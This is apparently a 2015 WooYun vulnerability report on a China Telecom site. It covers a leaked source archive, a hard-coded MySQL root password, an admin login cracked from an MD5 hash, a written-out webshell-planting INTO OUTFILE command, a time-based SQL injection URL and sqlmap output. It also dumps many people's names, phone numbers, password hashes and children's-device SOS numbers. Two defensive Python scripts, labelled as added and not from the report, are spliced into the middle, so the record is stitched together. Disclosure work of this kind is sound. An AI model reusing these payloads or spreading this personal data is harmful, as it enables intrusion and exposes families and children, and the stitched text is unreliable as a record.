
Vulnerability summary

Defect ID: wooyun-2015-0158329

Title: Source code leak on a China Telecom site + database root weak password + large-scale user data leak + getshell (5,000 children's-device records + SOS numbers + large volume of user data)

Vendor: a China Telecom site

Author: 0x 80

Submitted: 2015-12-04 20:30

Fixed: 2016-01-21 18:22

Published: 2016-01-21 18:22

Vulnerability type: sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-04: Details sent to the vendor, awaiting vendor handling
2015-12-08: Vendor has confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and domain experts
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public

Brief description:

Source code leak on a China Telecom site + database root weak password + large-scale user data leak + getshell (5,000 children's-device records + SOS numbers + large volume of user data)

Details:

http://**.**.**.**/web.rar
Obtained the source code and found the ROOT password in it

<?php
//GET Parameter Check
function get_check($p)
{
    if(!get_magic_quotes_gpc())
    {
        $p=addslashes($p);
    }
    $p=str_replace("_","\_",$p);
    $p=str_replace("%","\%",$p);
    return $p;
}
//POST Parameter Check
function sql_check($p)
{
    //new add
    $p=str_replace("'","",$p);
    $p=mysql_real_escape_string($p);
    //old
    if(!get_magic_quotes_gpc())
    {
        $p=addslashes($p);
    }
    $p=str_replace("_","\_",$p);
    $p=str_replace("%","\%",$p);
    $p=nl2br($p);
    $p=htmlspecialchars($p);
    return $p;
}
//-----------------------------------------------------------------------------
// database credentials hard-coded in the source: root account with a weak password
$DBLink=mysql_connect('**.**.**.**','root','dh`123') or die($error[0]);
mysql_select_db("tyga",$DBLink);
?>


Connected straight away

159	18937602299	18	e10adc3949ba59abbe56e057f20f883e	河南罗总	2015-6-4 16:00:06	32.158638	114.093521	16
256 13088985010 25 e10adc3949ba59abbe56e057f20f883e 董小军 2015-6-10 16:46:45 0.000000 0.000000 11
257 18182580358 25 e10adc3949ba59abbe56e057f20f883e WF 2015-6-18 16:20:23 0.000000 0.000000 11
258 18905006188 25 e10adc3949ba59abbe56e057f20f883e 王凡测试 2015-6-19 14:53:56 26.117235 119.326782 12
264 18047182815 23 6f50a800733784543b925ec681a402b2 高钰涵 2015-6-25 10:28:51 0.000000 0.000000 11
265 18047182569 23 0cdbec7f5f86a2183c75e9951fa8b1e5 王雪菲 2015-6-25 10:28:52 0.000000 0.000000 11
266 18047182844 23 e204bc32107eee8cab74d68515a5e41f 孟子龙 2015-6-25 10:28:53 0.000000 0.000000 11
267 18047182813 23 cf789c9f902ef5e3072da66868dbeffc 谷岳霖 2015-6-25 10:28:53 0.000000 0.000000 11
268 18047182578 23 a2a64265721427605ec182827171265b 吕菁 2015-6-25 10:28:54 0.000000 0.000000 11
269 18047182801 23 781ab01d91dbb17793ee8fb04af80ff5 李振华 2015-6-25 10:28:55 0.000000 0.000000 11
270 18047182825 23 91c0057de627ca433448d0f5a6824b4f 高子尧 2015-6-25 10:28:56 0.000000 0.000000 11
271 18047182846 23 cb56d9a767cab2d4916253a2074b9f95 李少晗 2015-6-25 10:28:57 0.000000 0.000000 11
272 18047182623 23 0c8f16f8552cd004628ec68dd0c0e090 张子豪 2015-6-25 10:28:58 0.000000 0.000000 11
273 18047182818 23 d06363c36485decb41cf00304b221813 张恒 2015-6-25 10:28:59 0.000000 0.000000 11
274 18047182820 23 fc0b0f0c2333da6f05b25cb863bf63f7 戴子轩 2015-6-25 10:29:00 0.000000 0.000000 11
275 18047182824 23 5650e3d1f3a77a25eb89cc8525ca3964 王泽润 2015-6-25 10:29:01 0.000000 0.000000 11
276 18047182821 23 bd647f07253bfa8dd419dccafedf128b 蔺鑫 2015-6-25 10:29:02 0.000000 0.000000 11
277 18047182823 23 303f3f9b6dfa59367cf07d45c8946439 魏子言 2015-6-25 10:29:03 0.000000 0.000000 11
278 18047182845 23 1725e9d919cd3fddc37c06955d0d7f85 李斯羽 2015-6-25 10:29:04 0.000000 0.000000 11
279 18047182800 23 2db63374a84a0609cd3347b8b71dda29 齐思宇 2015-6-25 10:29:05 0.000000 0.000000 11
280 18047182835 23 bbf5c2ef24ef06c6f3384e55917b5194 薛立玮 2015-6-25 10:29:06 0.000000 0.000000 11
281 18047182622 23 d41dfacb100578cd483d3b3145108574 刘正阳 2015-6-25 10:29:08 0.000000 0.000000 11
282 18047168378 23 a9e1ae5e8d494ab20c407d66947de273 马殿恩 2015-6-25 10:29:08 0.000000 0.000000 11
283 18047182812 23 173fee8167a6c1e538976093eaa72511 任怀宇 2015-6-25 10:29:09 0.000000 0.000000 11
284 18047182568 23 ed8b00d9c766c03570a1a0a7e4d52c3d 张权 2015-6-25 10:29:10 0.000000 0.000000 11
285 18047182834 23 35411dddf9c5d59f70dea280930574e1 赵晶晶 2015-6-25 10:29:11 0.000000 0.000000 11
286 18047182811 23 2cdfdf57eb5bf480f95995934d6f2906 刘阳 2015-6-25 10:29:13 0.000000 0.000000 11
287 13304719474 23 d5a4a6f286301df5ba1a19a2f310b151 马薏然 2015-6-25 10:29:14 0.000000 0.000000 11
288 18047182836 23 6fd4b3c75b94cebdd7f9740f9f0834dc 柴晨瑛 2015-6-25 10:29:15 0.000000 0.000000 11
289 18047182831 23 68a650835dc8133ea719ee5ecf3b622a 刘年昶 2015-6-25 10:29:15 0.000000 0.000000 11
292 18047182804 23 ab523dafa203dc5382c458aad0c08d0c 鲁佳彤 2015-6-25 10:29:18 0.000000 0.000000 11
293 18047182843 23 b8d6a657624b449a5a60d187793faf1e 刘晓雪 2015-6-25 10:29:19 0.000000 0.000000 11
294 18047182814 23 b7efc6d0d88fcd33e1f09eee4308842d 关哲坤 2015-6-25 10:29:20 0.000000 0.000000 11
295 18047182582 23 1c5cecea4ffd3111f71878448ce8d8fc 田育博 2015-6-25 10:29:21 0.000000 0.000000 11
296 18047182839 23 954c02549e9702ff19760ad15fddb968 杨宇熙 2015-6-25 10:29:23 0.000000 0.000000 11
297 18947928882 23 862caeba06e8ecdc8d8388334ab30de9 杨一祎 2015-6-25 10:29:24 0.000000 0.000000 11
298 18047182816 23 dde5b94ed22096eb384a741d644d427f 段鹏 2015-6-25 10:29:25 0.000000 0.000000 11
299 18047182802 23 f1cab1954b1fc4ff1914fc819d30f3c1 吴桐 2015-6-25 10:29:26 0.000000 0.000000 11
300 18047182577 23 854f9c56ec74ac40c9275ef89924b65e 樊铠鸣 2015-6-25 10:29:27 0.000000 0.000000 11
301 18047182826 23 6da21e4c6d7ac1ed2eb8ff72de8f6198 许津珠 2015-6-25 10:29:28 0.000000 0.000000 11
302 18047182630 23 c134918a102c69148a53b7a48cf5df9a 崔博雅 2015-6-25 10:29:29 0.000000 0.000000 11
303 18047182832 23 8ac073b9825a37b28d6e06eb79e75a03 张佳楠 2015-6-25 10:29:30 0.000000 0.000000 11
304 18047182807 23 045d8be31a9ad42bb05a8f4c43a53b2e 程宇良 2015-6-25 10:29:31 0.000000 0.000000 11
305 18047182837 23 89a2f66f05e9619e012525a461189da1 李宁格 2015-6-25 10:29:32 0.000000 0.000000 11
306 18047182806 23 1aaac2b9b3b1f8e457f75060cc71c5b9 张笑 2015-6-25 10:29:33 0.000000 0.000000 11
307 18047182809 23 580d45081cdd3ea8b3a74fa934550c44 杨天宇 2015-6-25 10:29:55 0.000000 0.000000 11
308 18047182808 23 6527792ffe69fa06c09644123834426b 吴鹏海 2015-6-25 10:29:58 0.000000 0.000000 11
309 15326035626 23 7cb2622a71da5dfc25981666b1190541 陈达来 2015-6-25 10:30:02 0.000000 0.000000 11
310 15384715448 23 57f737c7a68f88d6dcd86be88147ac40 王佳宣 2015-6-25 10:30:03 0.000000 0.000000 11


There are too many passwords to list them all

1	admin	0	f3abb86bd34cf4d52698f14c0da1dc60	admin	2015-6-8 08:55:10
18 henan 1 e10adc3949ba59abbe56e057f20f883e 河南区域 2015-6-4 15:58:01
21 内蒙区域 1 e10adc3949ba59abbe56e057f20f883e 内蒙区域 2015-6-8 09:11:30
23 shqdx 21 e10adc3949ba59abbe56e057f20f883e 赛罕区电信 2015-6-8 09:14:15
25 test 1 e10adc3949ba59abbe56e057f20f883e test 2015-6-8 14:08:48
26 btdx 21 e10adc3949ba59abbe56e057f20f883e 包头电信 2015-9-22 17:14:10
27 岳阳 1 e10adc3949ba59abbe56e057f20f883e 岳阳 2015-10-10 09:57:08
28 凌云 1 e10adc3949ba59abbe56e057f20f883e 凌云 2015-11-10 10:01:27
29 灞桥分部 28 5801c4690defb35f024b9d53b3d9b5c1 灞桥分部 2015-11-10 12:07:11
30 周至分部 28 9a2e171eca311a5d1875b0a7b2bd6283 周至分部 2015-11-18 09:01:16


After cracking: admin / zzz
Logged into the admin backend
**.**.**.**/admin/login.php?url=%2Fadmin%2F
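The admin table above could be cracked quickly because it stores bare 32-hex digests and the same digest recurs across accounts, which is the signature of unsalted MD5. The following Python is an added example, not code from the report or the site: the rows are constructed to mirror the shape of the leaked table (logins such as "neimeng" and "baqiao" are assumed), it audits a table for that weakness, and it shows a salted PBKDF2-HMAC-SHA256 replacement in which identical passwords no longer produce identical stored values.

```python
"""Added example (not from the report): what the leaked user table reveals about
password storage, and a salted-PBKDF2 replacement. Rows below are constructed;
e10adc3949ba59abbe56e057f20f883e is the well-known unsalted MD5 of '123456'."""
import hashlib
import hmac
import os
from collections import Counter

# Constructed rows (id, login, stored hash) modelled on the shape of the leaked table.
LEAKED_ROWS = [
    (18, "henan", "e10adc3949ba59abbe56e057f20f883e"),
    (21, "neimeng", "e10adc3949ba59abbe56e057f20f883e"),
    (23, "shqdx", "e10adc3949ba59abbe56e057f20f883e"),
    (25, "test", "e10adc3949ba59abbe56e057f20f883e"),
    (29, "baqiao", "5801c4690defb35f024b9d53b3d9b5c1"),
]


def looks_like_unsalted_md5(stored):
    """32 hex chars with no algorithm/salt prefix is the shape of a raw MD5 digest."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored.lower())


def audit_hashes(rows):
    """Return (login, finding) pairs for weaknesses visible from the table alone."""
    findings = []
    counts = Counter(h for _, _, h in rows)
    for _, login, h in rows:
        if looks_like_unsalted_md5(h):
            findings.append((login, "unsalted-md5-shape"))
        if counts[h] > 1:
            # Identical digests mean identical passwords: no per-user salt was used.
            findings.append((login, "hash-shared-by-%d-accounts" % counts[h]))
    return findings


def md5_hex(password):
    """The legacy scheme the table implies: a single unsalted MD5 of the password."""
    return hashlib.md5(password.encode()).hexdigest()


PBKDF2_ITERS = 600_000  # iteration count chosen for this example


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; salt and parameters travel with the digest."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERS, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt/iterations and compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for login, finding in audit_hashes(LEAKED_ROWS):
        print(login, finding)
    print(md5_hex("123456"))        # the digest that recurs in the leaked rows
    print(hash_password("123456"))  # different on every run: per-user salt
```

The audit runs on nothing but the stored values, so it can be applied to any exported user table before a migration; the PBKDF2 format embeds its own salt and iteration count so the parameters can be raised later without breaking existing records.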

15353050225 龙艳娥 bjfengxian 2015-12-04 11:41:05 【1】 [Change account password.] 0 [Close account]
2 18091719797 杨涛 bjxy 2015-12-03 15:29:14 【1】 [Change account password.] 0 [Close account]
3 18691713666 李巍 bjxy 2015-12-03 15:27:34 【1】 [Change account password.] 0 [Close account]
4 18609277123 艾绍远 bjxy 2015-12-03 15:26:04 【1】 [Change account password.] 0 [Close account]
5 18049171838 李春妮 bjfx 2015-12-03 14:13:54 【1】 [Change account password.] 0 [Close account]
6 18509175230 11 bjqy 2015-12-03 11:57:18 【1】 [Change account password.] 0 [Close account]
7 13992766000 董荣华 bjxy 2015-12-03 09:52:37 【1】 [Change account password.] 0 [Close account]
8 13088902628 杨洋 bjxy 2015-12-03 09:52:15 【1】 [Change account password.] 0 [Close account]
9 13379177862 严忠田 bjfx 2015-12-03 08:19:24 【1】 [Change account password.] 0 [Close account]
10 18991716388 任运平 bjxy 2015-12-01 17:42:23 【1】 [Change account password.] 0 [Close account]
11 13088949800 李彩霞 bjxy 2015-12-01 17:32:50 【1】 [Change account password.] 0 [Close account]
12 13992765476 孙宇 bjxy 2015-12-01 17:32:31 【1】 [Change account password.] 0 [Close account]
13 18392765880 白露 bjxy 2015-12-01 17:32:14 【1】 [Change account password.] 0 [Close account]
14 18109172301 郑雪会 bjxy 2015-12-01 17:31:57 【1】 [Change account password.] 0 [Close account]
15 15091710108 王晓卉 bjxy 2015-12-01 17:31:41 【1】 [Change account password.] 0 [Close account]
16 15309179365 郭红军 bjxy 2015-12-01 17:31:26 【1】 [Change account password.] 0 [Close account]
17 13759739878 杨彬 bjxy 2015-12-01 17:31:12 【1】 [Change account password.] 0 [Close account]
18 13772675356 许勇锋 bjxy 2015-12-01 17:30:53 【1】 [Change account password.] 0 [Close account]
19 18992780123 郑志祥 bjxy 2015-12-01 17:30:37 【1】 [Change account password.] 0 [Close account]
20 13992761750 陈伟 bjxy 2015-12-01 17:30:20 【1】 [Change account password.] 0 [Close account]
21 18991757785 王海萍 bjxy 2015-12-01 17:30:02 【1】 [Change account password.] 0 [Close account]
22 13892450121 叶辉 bjxy 2015-12-01 17:29:46 【1】 [Change account password.] 0 [Close account]
23 13909173193 张辉 bjxy 2015-12-01 17:29:31 【1】 [Change account password.] 0 [Close account]
24 15309173093 姜城堡测试 bjdx 2015-11-27 17:12:54 【1】 [Change account password.] 0 [Close account]
25 13571188935 辛力红 bjxy 2015-11-27 15:42:20 【1】 [Change account password.] 0 [Close account]


**.**.**.**:100/test.php discloses the filesystem path, which allows a file write
select '<?php @eval($_POST[c])>'INTO OUTFILE 'D:\ylsx100\3DES_CLASS.php';
**.**.**.**:100/admin/login.php admin 123456
One injection point:
**.**.**.**:100/get.php?nu=%27%2b(SELECT+1+FROM+(SELECT+SLEEP(25))A)%2b%27

web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[17:01:14] [INFO] fetching current database
[17:01:14] [WARNING] running in a single-thread mode. Ple
ption '--threads' for faster data retrieval
[17:01:14] [INFO] retrieved: order
current database: 'order'
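Three of the findings above leave distinctive traces in the web server's access log: the time-based payload on get.php (SLEEP inside the nu parameter), the INTO OUTFILE write, and the download of the web.rar archive from the web root. The Python below is an added example, not tooling from the report: it parses constructed Apache-style log lines (the IPs, timestamps and user agents are made up), URL-decodes each request twice so that double-encoded payloads are not missed, and flags requests matching those three patterns. A separate caveat that applies to the file write: INTO OUTFILE needs MySQL's FILE privilege, which the application had only because it connected as root; a least-privilege database account closes that path regardless of whether the injection itself is fixed.

```python
"""Added example (not from the report): flag access-log requests that look like
time-based SQL injection, INTO OUTFILE file writes, or downloads of source
archives left in the web root. All log lines below are constructed."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in Apache combined format (not the site's real logs).
SAMPLE_LOG = """\
10.0.0.5 - - [04/Dec/2015:17:01:14 +0800] "GET /get.php?nu=%27%2b(SELECT+1+FROM+(SELECT+SLEEP(25))A)%2b%27 HTTP/1.1" 200 512 "-" "sqlmap/1.0"
10.0.0.5 - - [04/Dec/2015:17:03:02 +0800] "GET /get.php?nu=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [04/Dec/2015:17:05:40 +0800] "GET /web.rar HTTP/1.1" 200 8123456 "-" "Wget/1.16"
10.0.0.9 - - [04/Dec/2015:17:06:11 +0800] "GET /test.php?q=select+1+INTO+OUTFILE+%27D%3A%5Cx.php%27 HTTP/1.1" 200 20 "-" "curl/7.40"
10.0.0.9 - - [04/Dec/2015:17:07:00 +0800] "GET /admin/terminal_excel.php?id=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request path (with query string) and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

# Detection rules applied to the decoded request; names are this example's own.
RULES = [
    ("time-based-sqli", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("file-write-sqli", re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("archive-in-webroot", re.compile(r"\.(rar|zip|7z|tar\.gz|bak|sql)(\?|$)", re.I)),
]


def classify_request(path):
    """Return the list of rule names that match one request path."""
    decoded = unquote_plus(path)
    # Decode a second time so a double-encoded payload (%2553LEEP) is still seen.
    decoded = unquote_plus(decoded)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text):
    """Return (ip, timestamp, raw path, [matched rules]) for each suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        rules = classify_request(m.group("path"))
        if rules:
            hits.append((m.group("ip"), m.group("ts"), m.group("path"), rules))
    return hits


if __name__ == "__main__":
    for ip, ts, path, rules in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {','.join(rules)} {path}")
```

The archive rule is the cheapest of the three to act on: a 200 response for web.rar or any .zip/.bak/.sql under the document root means a backup was left where the web server serves it, and a single successful download is already a full source leak, so that rule should alert on the first hit rather than on a threshold.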


Children's devices

No.	Device number	Device name	Opened at	Owner account	Region	KEY1	KEY2	KEY3	KEY4	SOS number
1 18049574700 74700 2015-12-4 14:54 18049574700 gxyz 18629242878 15309262109 15309262108 18629511595 18629242878
2 18991758664 58664 2015-12-4 11:41 15353050225 bjfengxian 15353050225 15389333366 17734605460 15353050225
3 13325377754 77754 2015-12-3 15:35 18091719797 bjxy 18091719797 18091719797
4 18992714721 14721 2015-12-3 15:35 18609277123 bjxy 18609277123 18609277123
5 13359174359 74359 2015-12-3 15:29 18691713666 bjxy 18691713666 18691713666
6 18049171838 71838 2015-12-3 14:14 18049171838 bjfx 13991748758 13571796818 7218033 13571162087 13991748758
7 18992772856 72856 2015-12-3 11:58 18509175230 bjqy 18509175230 18009173889 13991718512 18613209007 18509175230
8 18191483241 83241 2015-12-3 9:54 13992766000 bjxy 13992766000 13992766000
9 18191482645 82645 2015-12-3 9:54 13088902628 bjxy 13088902628 13088902628
10 18049170560 70560 2015-12-3 8:19 13379177862 bjfx 18291779498 13892491639 18092565398 13567428163 15309178933
11 15353342575 42575 2015-12-1 18:07 13088949800 bjxy 13088949800 13088949800
12 13347462486 62486 2015-12-1 18:07 13992765476 bjxy 13992765476 13992765476
13 18992772410 72410 2015-12-1 18:06 18991757785 bjxy 18991757785 18991757785
14 13379488515 88515 2015-12-1 18:06 18392765880 bjxy 18392765880 18392765880
15 18991745617 45617 2015-12-1 18:06 13892450121 bjxy 13892450121 13892450121
16 18991746156 46156 2015-12-1 18:05 13909173193 bjxy 13909173193 13909173193
17 18992772467 72467 2015-12-1 17:42 18991716388 bjxy 18991716388 18991716388
18 15353342870 42870 2015-12-1 17:40 18109172301 bjxy 18109172301 18109172301
19 13369204015 4015 2015-12-1 17:39 15091710108 bjxy 15091710108 15091710108
20 15353342653 42653 2015-12-1 17:39 15309179365 bjxy 15309179365 15309179365
21 18992743871 43871 2015-12-1 17:39 13759739878 bjxy 13759739878 13759739878
22 13347460905 60905 2015-12-1 17:38 13992761750 bjxy 13992761750 13992761750
23 15353005460 5460 2015-12-1 17:38 18992780123 bjxy 18992780123 18992780123
24 15384578752 78752 2015-12-1 17:37 13772675356 bjxy 13772675356 15009276638 15592528771 15609172596 13772675356
25 18909173066 73066 2015-11-27 17:13 15309173093 bjdx 15309173093 18909175598 18966934909 15309178051 15309173093
26 15309179673 79673 2015-11-27 16:43 13809173322 bjxy 13369207030 18991706663 13809173322 13709276273 13809173322
27 15399210607 10607 2015-11-27 15:42 13571188935 bjxy 18909171508 13571188935 18291806341 3126499;~ 13571188935
28 13325379342 79342 2015-11-27 13:58 18690023004 bjxy 18690023004 18690023004
29 13325379146 79146 2015-11-27 13:58 13891709607 bjxy 13891709607 13892415329 8899089 13619274425 13891709607
30 13335475041 75041 2015-11-27 13:58 13772703980 bjxy 13772703980 13772703982 13759795723 13759795729 13772703980
31 13325377940 77940 2015-11-27 13:57 13892772589 bjxy 13892772589 13892772589
32 13325375402 75402 2015-11-27 13:57 18891788669 bjxy 18891788669 13892782770 15291702798 15291702352 13892782770
33 13335474647 TONG 2015-11-27 13:57 13619270166 bjxy 13619270166 15991970840 13891792641 13619270166
34 13335469842 69842 2015-11-27 13:57 18909170993 bjxy 18909170993 18909170279 18091690008 13309170805 18909170993
35 18191484874 84874 2015-11-27 13:56 13891737690 bjxy 13891737690 13891737690
36 18191483764 83764 2015-11-27 13:56 15877603288 bjxy 15877603288 13891780696 15877603288
37 18191484751 84751 2015-11-27 13:56 13809170103 bjxy 13809170103 13809170103
38 18191481224 81224 2015-11-27 13:54 13509173278 bjxy 13509173278 13509173278
39 18191482949 82949 2015-11-26 15:32 13772642200 bjxy 13772642200 13772642200
40 18191481431 81431 2015-11-26 15:31 13369200270 bjxy 13369200270 13369200270
41 18191481954 81954 2015-11-26 15:30 13891712526 bjxy 13891712526 13891712526
42 18191482443 82443 2015-11-25 19:55 13991726350 bjxy 13991726350 13991726350
43 18191484946 84946 2015-11-25 19:55 17719623090 bjxy 17719623090 17719623090
44 18191481241 81241 2015-11-25 19:55 13098155777 bjxy 13098155777 13098155777
45 18191484823 84823 2015-11-25 19:54 15877693369 bjxy 15877693369 15877693369
46 18191484671 84671 2015-11-25 19:54 13571731529 bjxy 13571731529 13571731529
47 18191483364 83364 2015-11-25 19:54 18690009855 bjxy 18690009855 18690009855
48 18191484802 84802 2015-11-25 19:54 13008477528 bjxy 13008477528 13008477528
49 18191483418 83418 2015-11-25 19:53 13259170300 bjxy 13259170300 13259170300
50 18191483648 83648 2015-11-25 19:52 13092931098 bjxy 13092931098 13092931098
51 18191485154 85154 2015-11-25 19:46 18049381650 bjxy 18049381650 18049381650
52 18191483314 83314 2015-11-25 19:46 15829494670 bjxy 15829494670 15829494670
53 18191484249 84249 2015-11-25 19:44 13571171230 bjxy 13571171230 13571171230
54 18191484149 84149 2015-11-25 19:44 13991751537 bjxy 13991751537 13991751537
55 18191484197 84197 2015-11-25 19:43 13992782033 bjxy 13992782033 13992782033
56 18191481349 81349 2015-11-25 19:43 18991707777 bjxy 18991707777
57 18191484841 84841 2015-11-25 19:43 15829508158 bjxy 15829508158 15829508158
58 18191484453 84453 2015-11-25 19:37 13909171740 bjxy 13909171740 13909171740


Image upload hung, so I can only list it this way
**.**.**.**/admin/terminal_excel.php?id=1 (children's-device data export)

Proof of vulnerability:

http://**.**.**.**/web.rar

Remediation:

Fix it properly; there are many problems

Copyright notice: when reposting, please credit the source 0x 80@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-12-08 12:45

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded by CNCERT to China Telecom Group, which will coordinate handling with the site's management department.

Latest status:

None